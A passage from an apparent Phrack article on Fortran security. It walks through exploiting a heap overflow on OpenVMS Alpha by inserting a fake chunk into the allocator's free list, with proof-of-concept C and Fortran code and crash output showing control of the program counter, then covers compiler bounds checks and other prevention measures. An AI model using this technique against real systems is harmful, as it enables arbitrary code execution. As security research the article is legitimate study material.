So in the end, a free() is 'almost' equivalent to an element insertion in a
|
|
single list. In practice, the real allocator may well be a bit more complex
|
|
as I didn't investigate the chunks splitting/fusion mechanisms (if any).
|
|
Note that a free()ed chunk will become the first of the corresponding
|
|
single chained list, something to keep in mind.
|
|
|
|
The malloc() function is pretty straightforward:
|
|
|
|
-----BEGIN malloc()-----
|
|
void *malloc(size_t s):
|
|
CHUNK *c, *head;
|
|
size_t s_new = ROUND(s);
|
|
head = get_head_from_size(s_new); [M1]
|
|
|
|
if(!head->first)
|
|
{
|
|
[...]
|
|
}
|
|
|
|
c = head->first; [M2]
|
|
c->tag = 0xF00D; [M3]
|
|
head->first = c->NEXT_MEM; [M4]
|
|
return (mem_from_chunk(c));
|
|
-----END malloc()-----
|
|
|
|
A malloc() is the removal of a chunk from the corresponding chained list.
|
|
Note that the first chunk of the list will be the first to be removed. If
|
|
the list is empty, a special treatment is performed but we don't care about
|
|
that.
|
|
|
|
Taking advantage of the overflow
|
|
--------------------------------
|
|
|
|
Exploiting an heap overflow can be done using at least two techniques:
|
|
|
|
*) The (partial) overwrite of metadata stored on the heap. Depending on
|
|
where and how much you can overflow, this might be interesting
|
|
especially since function pointers could be stored there.
|
|
|
|
*) The fake chunk insertion. The idea is to make malloc returning an
|
|
address pointing to a chosen area (like the stack). The normal use
|
|
of the buffer will then lead to the control of the process.
|
|
|
|
Since the first technique is no news, let's see how to perform the second
|
|
one. In order to do that, we'll play with following C code:
|
|
|
|
-----BEGIN HEAP VMS 1-----
|
|
// Allocation
|
|
int *p = malloc(100);
|
|
int *q = malloc(100);
|
|
memset(p, 0x41, 100);
|
|
memset(q, 0x42, 100);
|
|
free(q); [N1]
|
|
// heap overflow
|
|
memcpy(p, user_buff, user_size); [N2]
|
|
-----END HEAP VMS 1-----
|
|
|
|
In order to simplify things, we'll assume that there was no previous
|
|
allocation in the same BIN. Let's visualize the heap layout:
|
|
|
|
Before [N1] Before [N2] After [N2]
|
|
|
|
[ 00000070 ] [ 00000070 ] [ 00000070 ]
|
|
[ f00d3d00 ] [ f00d3d00 ] [ f00d3d00 ]
|
|
p -> [ 41414141 ] [ 41414141 ] [ 41414141 ]
|
|
[ 41414141 ] [ 41414141 ] [ 41414141 ]
|
|
[ 41414141 ] [ 41414141 ] [ 41414141 ]
|
|
[ 41414141 ] [ 41414141 ] [ 41414141 ]
|
|
[ ... ] [ ... ] [ ... ]
|
|
[ 00000070 ] [ 00000070 ] [ 55555555 ]
|
|
[ f00d3d00 ] [ 77773d00 ] user -> [ 55555555 ]
|
|
q -> [ 42424242 ] [ 00000000 ] supplied [ 00000000 ]
|
|
[ 42424242 ] [ 42424242 ] pointer [ 42424242 ]
|
|
|
|
Now regarding the associated linked list, we have the following evolution:
|
|
|
|
+------------+ +------------+
|
|
1. | Bin 0x3d |---->| 0x00000000 |
|
|
+------------+ +------------+
|
|
|
|
+------------+ +------------+ +------------+
|
|
2. | Bin 0x3d |---->| q |---->| 0x00000000 |
|
|
+------------+ +------------+ +------------+
|
|
|
|
+------------+ +------------+ +------------+
|
|
3. | Bin 0x3d |---->| q |---->| 0x55555555 |
|
|
+------------+ +------------+ +------------+
|
|
|
|
As a result, the linked list of our bin is corrupted and q->NEXT_MEM is
|
|
user supplied. To prove that fact, we can dereference q->NEXT_MEM as it
|
|
will lead to a program crash. This is possible thanks to [M4] if two
|
|
malloc(100) are performed after the corruption:
|
|
|
|
-----BEGIN HEAP VMS 2-----
|
|
VMS $ r POC
|
|
[...]
|
|
0000447d0: 41414141 41414141 41414141 41414141
|
|
0000447e0: 41414141 41414141 41414141 41414141
|
|
0000447f0: 41414141 41414141 41414141 41414141
|
|
000044800: 41414141 55555555 55555555 f00d5555 [O1]
|
|
000044810: 55555555 42424242 42424242 42424242
|
|
000044820: 42424242 42424242 42424242 42424242
|
|
000044830: 42424242 42424242 42424242 42424242
|
|
000044840: 42424242 42424242 42424242 42424242
|
|
[...]
|
|
%SYSTEM-F-ACCVIO, access violation, [...] virtual address=0000000055555555
|
|
%TRACE-F-TRACEBACK, symbolic stack dump follows
|
|
image module routine line rel PC abs PC
|
|
LIBRTL 0 000000000000610C FFFFFFFF80C2E10C
|
|
LIBRTL ? ?
|
|
DECC$SHR_EV56 0 0000000000052710 FFFFFFFF80DDE710
|
|
DECC$SHR_EV56 ? ?
|
|
POC POC main 4210 00000000000003BC 00000000000203BC
|
|
POC POC __main 4128 000000000000006C 000000000002006C
|
|
-----END HEAP VMS 2-----
|
|
|
|
It's interesting to see that _fortunately_ size doesn't matter ;). Indeed
|
|
free() is not 'really' looking at what's written in the corrupted chunk's
|
|
header [O1] (size, allocation tag, ...). Great for us it makes things even
|
|
easier.
|
|
|
|
However something really important is that the corruption would seemingly
|
|
not have been possible if q was allocated as:
|
|
|
|
*) if q was allocated then it wouldn't be part of the list.
|
|
*) and if q was free()ed _after_ the corruption then q->NEXT_MEM would
|
|
naturally be overwritten by free().
|
|
|
|
There might be a way to trick the allocator so that an arbitrary free() is
|
|
performed but I couldn't find any way to do that probably because my
|
|
knowledge of the allocator algorithm is rather limited.
|
|
|
|
At that point, we've almost won as we successfully inserted a fake chunk
|
|
in the linked list. As a result, writing will be performed at a user
|
|
supplied address. However depending on the context, we may or may not be
|
|
able to sufficiently control _what_ will be written:
|
|
|
|
*) If we cannot control the payload then a F00D delivery is still
|
|
possible thanks to [M3]. If we can make the program perform the two
|
|
necessary allocations, then the program will write 0xF00D at 'addr'
|
|
if NEXT_MEM is overwritten with 'addr+2'. If you plan to exploit the
|
|
least significant bits of a pointer then you can probably improve the
|
|
technique with an F0 overwrite if the data located immediately before
|
|
can be partially corrupted.
|
|
|
|
Note: Starving hackers would probably have thought of turning F00D
|
|
into 0D but remember that Alpha is big endian.
|
|
|
|
*) If we can control the payload, then the best way is probably to
|
|
overwrite the PC address saved on the stack (there is no ASLR folks).
|
|
Back on our feets [R9]:
|
|
|
|
-----BEGIN HEAP VMS 3-----
|
|
VMS $ type poc.F90
|
|
PROGRAM POC
|
|
INTEGER(4), POINTER :: P(:)
|
|
INTEGER(4), POINTER :: Q(:)
|
|
INTEGER(4), POINTER :: M(:)
|
|
INTEGER(4), POINTER :: P2(:)
|
|
INTEGER(4) :: I
|
|
|
|
ALLOCATE(P(100))
|
|
ALLOCATE(Q(100))
|
|
|
|
! Debugging purpose
|
|
P = 'AAAA'
|
|
Q = 'BBBB'
|
|
write(*,fmt='(A,Z10)') ' P=',%LOC(P)
|
|
write(*,fmt='(A,Z10)') ' Q=',%LOC(Q)
|
|
|
|
P2 => P
|
|
DEALLOCATE(Q)
|
|
|
|
! Fake heap overflow
|
|
P2(101) = Z'55555555'
|
|
P2(102) = Z'55555555'
|
|
P2(103) = Z'55555555'
|
|
P2(104) = Z'55555555'
|
|
P2(105) = Z'7AE3D910' + 100 ! fixed to work ;)
|
|
|
|
write(*,*) "******** AFTER CORRUPTION ************"
|
|
ALLOCATE(M(100))
|
|
write(*,*) "******** AFTER MALLOC 1 ************"
|
|
|
|
ALLOCATE(M(100))
|
|
write(*,fmt='(A,Z10)') ' FAKE CHUNK AT ',%LOC(M)
|
|
! Simulating a user supplied payload
|
|
DO I=1,80
|
|
M(I) = Z'44444444'
|
|
END DO
|
|
END PROGRAM
|
|
VMS $ FORT poc
|
|
VMS $ LIN poc
|
|
VMS $ r poc
|
|
P= 52008
|
|
Q= 521A8
|
|
******** AFTER CORRUPTION ************
|
|
******** AFTER MALLOC 1 ************
|
|
FAKE CHUNK AT 7AE3D974
|
|
%SYSTEM-F-ACCVIO, [...] PC=4444444444444444, PS=0000001B
|
|
%TRACE-F-TRACEBACK, symbolic stack dump follows
|
|
image module routine line rel PC abs PC
|
|
0 4444444444444444 4444444444444444
|
|
-----END HEAP VMS 3-----
|
|
|
|
Note: The stack address is hardcoded but this is not a big issue as there
|
|
is no ASLR :).
|
|
|
|
One step further
|
|
----------------
|
|
|
|
OK a few more things and we're done with OpenVMS (anyway at that point
|
|
you're probably either sleeping already or reading a much more interesting
|
|
article of this issue ;)).
|
|
|
|
1) I came across this funny thing while reading HP's documentation [R11]:
|
|
|
|
---
|
|
Chap 5.9.5 2-GB malloc No Longer Fails Silently
|
|
|
|
The C RTL malloc function accepts an unsigned int (size_t) as its
|
|
parameter. The LIB$VM_MALLOC action accepts a (positive) signed integer as
|
|
its parameter. Allocating 2 GB (0x80000000) did not allocate the proper
|
|
amount of memory and did not return an error indication. A check is now
|
|
added to the malloc, calloc, and realloc functions for sizes equal to or
|
|
greater than 2 GB that fail the call.
|
|
---
|
|
|
|
WOWOWOWO jackpot :) Who said this _could_ have security consequences? ;>
|
|
|
|
2) I investigated the ALLOCATE(size) issue under OpenVMS Alpha 8.3 and the
|
|
result is that if size <= 0 and size >= -0x80000000 then the address 0x100
|
|
is returned (if size < -0x80000000 an input conversion occurs
|
|
(%FOR-F-INPCONERR)).
|
|
|
|
Since the 0x100 address is not mmaped, the only way to exploit this
|
|
situation would be to dereference the pointer using a sufficiently great
|
|
index to access user controlled data. While this is theoretically feasible
|
|
since memory regions are mmaped at low addresses, a practical case has yet
|
|
to be found.
|
|
|
|
---
|
|
|
|
---[ 7 - Prevention: lets use a condom
|
|
|
|
Now is the time to think about how to avoid security troubles with Fortran
|
|
programs. In order to do that, several things (more or less effective) can
|
|
be done:
|
|
|
|
*) A careful review of the source code. Believe me, it's not that easy.
|
|
To properly perform that, you have to know the language deeply and
|
|
being well aware of its weaknesses. Depending on your level of
|
|
mastery, bugs may still be left as Fortran really is a vicious
|
|
language. Mastering this paper for example is probably far from
|
|
being enough.
|
|
|
|
*) The study of your Fortran compiler. Try to find what kind of bugs
|
|
are likely to be found/exploited with your compiler. A good starting
|
|
point is probably to have a look at the "Compiler Diagnostic Test
|
|
Sets" project [R17]. Not only will you find accurate information
|
|
about several compilers but you will also find new kind of bugs
|
|
(though not always security related) as well as a precious test set.
|
|
|
|
*) Read the manpage of your compiler to see if compile/runtime extra
|
|
security checks could be performed. Let me show you an example.
|
|
Remember that in Chap 3.1 I gave the following example:
|
|
|
|
-----BEGIN OVERFLOW 1-----
|
|
$ cat overflow1.f90
|
|
PROGRAM test
|
|
CHARACTER(len=30) :: S ! String of length 30
|
|
INTEGER(4) I
|
|
S = 'Hello Phrack readers!'
|
|
read(*,*) I
|
|
S(I:I) = '.'
|
|
write(*,*) S
|
|
END PROGRAM
|
|
$ gfortran overflow1.f90
|
|
$ ./a.out
|
|
He.lo Phrack readers! <-- S was modified with 0x2E
|
|
$ gdb ./a.out
|
|
[...]
|
|
(gdb) r
|
|
Starting program: a.out
|
|
50 <-- 50 is clearly out of scope! (>30)
|
|
Breakpoint 1, 0x080487be in MAIN__ ()
|
|
(gdb) print /d $eax
|
|
$1 = 50
|
|
(gdb) c
|
|
Hello Phrack readers!
|
|
Program received signal SIGSEGV, Segmentation fault.
|
|
0x2e04885b in ?? () <-- EIP was corrupted with 0x2E
|
|
-----END OVERFLOW 1-----
|
|
|
|
Now let's see what happens when the '-fbounds-check' option is used:
|
|
|
|
-----BEGIN OVERFLOW 2-----
|
|
$ gfortran overflow1.f90 -fbounds-check
|
|
$ ./a.out
|
|
[Type 50]
|
|
At line 7 of file overflow1.f90
|
|
Fortran runtime error: Substring out of bounds: upper bound (50) of
|
|
's' exceeds string length (30)
|
|
$ ./a.out
|
|
[Type -1]
|
|
At line 7 of file overflow1.f90
|
|
Fortran runtime error: Substring out of bounds: lower bound (-1) of
|
|
's' is less than one
|
|
-----END OVERFLOW 2-----
|
|
|
|
As expected, the program now includes runtime checks. Depending on
|
|
the bug class, the compiler may have a specific option to prevent or
|
|
detect it. RTFM.
|
|
|
|
*) Static analysis. Well to be honest I didn't investigate it at all.
|
|
While digging for this article, I came across a couple of opensource
|
|
projects as well as commercial implementations (sorry NO ADVERTISING
|
|
in PHRACK dudes).
|
|
|
|
While I didn't test any of them, I can imagine that there may
|
|
effective ones as some kind of bugs would really be easy to spot
|
|
using for example type checking (first thing that comes to my mind).
|
|
Anyway it's just mere speculation. Either test it or forget it. Like
|
|
we care anyway.
|
|
|
|
Sometimes a condom is not enough. The best for you is probably not to use
|
|
this insanely fucked language. Once again, who cares about Fortran anyway?
|
|
|
|
[ http://www.fortranstatement.com/cgi-bin/petition.pl ]
|
|
|
|
---
|
|
|
|
---[ 8 - The final words
|
|
|
|
There would have been a lot more to add (studying other compilers/arch) but
|
|
unfortunately time is running out and I would rather not make the paper
|
|
more boring than it currently is ;) Anyway as far as I can tell, the
|
|
essential is covered and with that in mind and a bit of practice, I expect
|
|
you to be able to quickly find new bugs.
|
|
|
|
Hackers dealing with/busting/exploiting bugs in Fortran programs are
|
|
so rare in our World that I bet that none of you had ever heard a word
|
|
about Fortran's security issues. Nowadays people are more focused on
|
|
languages such as PHP, Java or .NET which is normal for obvious reasons.
|
|
Now it doesn't mean that other languages are not interesting too and you
|
|
never know when appropriate knowledge becomes handy. History proved that
|
|
bugs not always occurred in the 'daily' hacking playground (C/PHP,
|
|
Unix/Windows) [R19] so why would we restrain ourselves?
|
|
|
|
Not convinced? OK allow me to alter the smart thoughts of a fellow p67
|
|
writer: "We hack Fortran just because we can. We don't really need a reason
|
|
anyway as soon as bugs are there, we are there."
|
|
|
|
---
|
|
|
|
---[ 8 - Greetz
|
|
|
|
My first thoughts are for all talented hackers with whom I had so much to
|
|
share all these years. May you guys never lose that spirit of yours nor
|
|
your ethics [R15]. Special thanks to the Phrack staff for their help,
|
|
advise and review.
|
|
|
|
Now and because alone life would have no meaning, special thanks to my
|
|
friends not only for being there but also for being able to support me
|
|
especially when I'm *cranky* as hell :')
|
|
|
|
Special apologize to the great guys of the FHC (Fortran High Council). Just
|
|
for once I wanted to be as cool as king-fag-c0pe though it probably means
|
|
that it's a matter of days before witnessing the bust of all cool Fortran
|
|
0dayZ on FD :((( Don't be afraid sysadmins, thanx to gg security folks
|
|
everything will be done in a 'responsible' way [R16] ;>
|
|
|
|
Also thanks to all of you who will nominate this paper at the 2011 pwnies
|
|
award as the "most innovative research paper" ;>
|
|
|
|
---
|
|
|
|
---[ 9 - Bibliography
|
|
|
|
[R1] http://onepiece.wikia.com/wiki/Buggy
|
|
[R2] Fortran90, ISO/IEC 1539
|
|
[R3] http://gcc.gnu.org/onlinedocs/gfortran/
|
|
[R4] HP Fortran for OpenVMS - Language Reference Manual, HP
|
|
[R5] Shifting the Stack Pointer, andrewg, Phrack #63
|
|
[R6] Basic Integer Overflows, Blexim, Phrack #60
|
|
[R7] http://www.cs.rpi.edu/~szymansk/OOF90/bugs.html
|
|
[R8] http://h71000.www7.hp.com/success-stories.html
|
|
[R9] Hacking OpenVMS, C. Nyberg, C. Oberg & J. Tusini, Defcon16
|
|
[R10] http://www.cisl.ucar.edu/tcg/consweb/Fortran90/scnpoint.html
|
|
[R11] HP OpenVMS Version 8.3 Release Notes, HP
|
|
[R12] Alpha Assembly Language Guide, R.Bryant, Carnegie Mellon University
|
|
[R13] http://labs.hoffmanlabs.com/node/401
|
|
[R14] OpenVMS Alpha Internals and Data Structures: Memory Management, HP
|
|
[R15] Industry check, ZF0 #5
|
|
[R16] http://googleonlinesecurity.blogspot.com/2010/07/rebooting-
|
|
responsible-disclosure-focus.html (lol)
|
|
[R17] http://ftp.cac.psu.edu/pub/ger/fortran/test/results.txt
|
|
[R18] http://www.fortranstatement.com
|
|
[R19] http://www5.in.tum.de/persons/huckle//horrorn.pdf
|
|
[R20] http://deathrow.vistech.net
|
|
|
|
---
|
|
|
|
That is the saving of humor, if you fall no one is laughing at you.
|
|
A. Whitney Brown
|
|
|
|
---
|